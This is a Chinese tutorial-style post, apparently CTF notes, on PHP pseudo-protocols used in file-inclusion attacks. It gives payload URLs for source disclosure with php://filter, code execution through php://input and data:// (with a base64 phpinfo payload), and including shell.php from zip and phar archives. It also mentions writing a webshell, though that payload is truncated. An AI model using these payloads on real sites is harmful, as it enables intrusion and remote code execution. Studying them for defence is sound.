php伪协议总结

php伪协议总结

概述

PHP伪协议，也是php支持的协议和封装协议

常见的伪协议有：

php://		访问各个输入输出流
file://		访问本地文件系统
data://		获取数据（RFC 2397）
zip://		获取压缩流
phar://	PHP归档
http://		访问网址
zilb://		压缩流
ftp://		访问ftp
glob://		查找匹配的文件路径模式
ssh2://		secure shell 2
rar://		RAR
ogg://		音频流
expect://	处理交互式的流

1
2
3
4
5
6
7
8
9
10
11
12
13
14

主要协议适用场景要求

1、php://协议

师傅们写的真不错
参考文章
参考文章

条件：
allow_url_fopen:off/on
allow_url_include :仅php://input php://stdin php://memory php://temp 需要on

作用：
php:// 访问各个输入/输出流（I/O streams），在CTF中经常使用的是php://filter和php://input，php://filter用于读取源码，php://input用于执行php代码。

说明
PHP 提供了一些杂项输入/输出（IO）流，允许访问 PHP 的输入输出流、标准输入输出和错误描述符，
内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。
1
2
3
4
5
6
7
8
9
10

常用相关协议
php://filter

条件
需要开启 allow_url_fopen
用法
?file=php://filter/convert.base64-encode/resource=xx.php

?file=php://filter/read=convert.base64-encode/resource=xx.php

1
2
3
4
5
6
7

php://input

条件
allow_url_fopen=on/off
allow_url_include=on
用法
php://input + [POST DATA]执行php代码

http://127.0.0.1/include.php?filephp://input
[POST DATA]

若有写权限，可以写入一句话木马
http://127.0.0.1/include.php?file=php://input
[POST DATA]
'); ?> 
1
2
3
4
5
6
7
8
9
10
11
12
13

file:\

条件
allow_url_fopen=on/off
allow_url_include=on/off 
用法

?file=file://C:\Windows\System32\drivers\etc\hosts
//读取本地文件
1
2
3
4
5
6
7

data://

条件
此协议需要在双on的情况下才能使用，很常用的数据流构造器，将读取后面base编码字符串后解码的数据作为数据流的输入

用法
data://text/plain;base64,base64编码字符 
http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

data://text/plain,字符 
http://127.0.0.1/cmd.php?file=data://text/plain, plain后写要传入的内容。


1
2
3
4
5
6
7
8
9
10
11

zip://

条件
allow_url_fopen和allow_url_include的启用与否无关系

用法
zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]
?file=zip://D:\phpstudy\WWW\x.zip%23shell.php

1
2
3
4
5
6
7

phar://

条件
allow_url_fopen和allow_url_include的启用与否无关系
php版本大于等于5.3.0
用法

phar://压缩包名/内部文件名
?file=phar://D:\phpstudy\WWW\x.zip/shell.php

1
2
3
4
5
6
7
8

还有其他的压缩包协议
参考链接